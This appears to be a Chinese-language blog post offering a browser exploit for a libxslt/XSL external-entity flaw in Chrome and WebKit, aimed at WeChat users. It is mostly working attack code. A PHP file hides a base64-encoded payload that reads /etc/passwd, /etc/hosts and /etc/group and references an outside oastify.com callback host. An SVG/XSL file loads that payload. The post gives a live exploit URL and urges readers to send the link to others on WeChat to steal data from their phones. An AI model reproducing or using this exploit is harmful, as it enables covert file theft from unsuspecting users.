[最新微信受影响] Chrome 任意文件读取EXP

漏洞背景

简要描述：

Libxslt 是基于 WebKit 的浏览器（如 Chrome、Safari 等）中使用的默认 XSL（eXtensible Stylesheet Language）库。Libxslt 允许通过 XSL 的 document() 方法加载的文档中包含外部实体。攻击者可以绕过安全限制，从 http(s):// URL 中访问 file:// URL，并获得文件访问权限。
在默认沙盒环境下，攻击者可以在 iOS（Safari/Chrome）、Mac（Safari/Chrome）、Android（Chrome）和Samsung TV（默认浏览器）上读取 /etc/hosts(主机)文件。当使用 -no-sandbox 属性时（Electron/PhantomJS），攻击者可以在任何操作系统上读取任何文件。

如果没记错，微信是没有开沙箱的，那就是任意文件读取。

EXP 说明

exp.php

<?php
header("Access-Control-Allow-Origin: *");
echo base64_decode("PD94bWwtc3R5bGVzaGVldCB0eXBlPSJ0ZXh0L3htbCIgaHJlZj0iaHR0cDovL3dkZDBuYW9xbTVzZ2p5bHV2endzaTJ6bXZkMTRwdmRrLm9hc3RpZnkuY29tL3dxZSI/Pgo8IURPQ1RZUEUgcCBbCjwhRU5USVRZIHBhc3N3ZCBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCI+CjwhRU5USVRZIGhvc3RzIFNZU1RFTSAiZmlsZTovLy9ldGMvaG9zdHMiPgo8IUVOVElUWSBncm91cCBTWVNURU0gImZpbGU6Ly9sb2NhbGhvc3QvZXRjL2dyb3VwIj4KCl0+IA==");
?>
<p>

  <p style="border-style: dotted;">/etc/passwd: 

&passwd;
  </p>
 <p style="border-style: dotted;">/etc/hosts:

&hosts;
  </p>
 <p style="border-style: dotted;">/etc/group:

&group;
  </p>

</p>

得到: http://exp.root.nday.pw/exp.php

再新建一个 exp.svg 文件在 document引用加载刚才新建的文件exp.php

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

<xsl:template match="/">

  <svg width="1000%" height="1000%" version="1.1" xmlns="http://www.w3.org/2000/svg">
    <foreignObject class="node" font-size="18" width="100%" height="100%">
    <body xmlns="http://www.w3.org/1999/xhtml">
      <xmp><xsl:copy-of  select="document('exp.php')"/></xmp>
      <script type="text/javascript"></script>
    </body>
    </foreignObject>
  </svg>

  </xsl:template>
</xsl:stylesheet>

在微信把链接发给别人，即可读取到别人手机上的敏感信息。

深入利用

怎么实现数据外带呢？

第一步

第二步:

第三步:

成功外带数据

漏洞测试链接

自行访问看看: http://exp.root.nday.pw/exp06.svg

关注回复公众号

如果还不明白，关注我，手把手教你获取完整的EXP文件

参考链接

https://bugs.chromium.org/p/chromium/issues/detail?id=1458911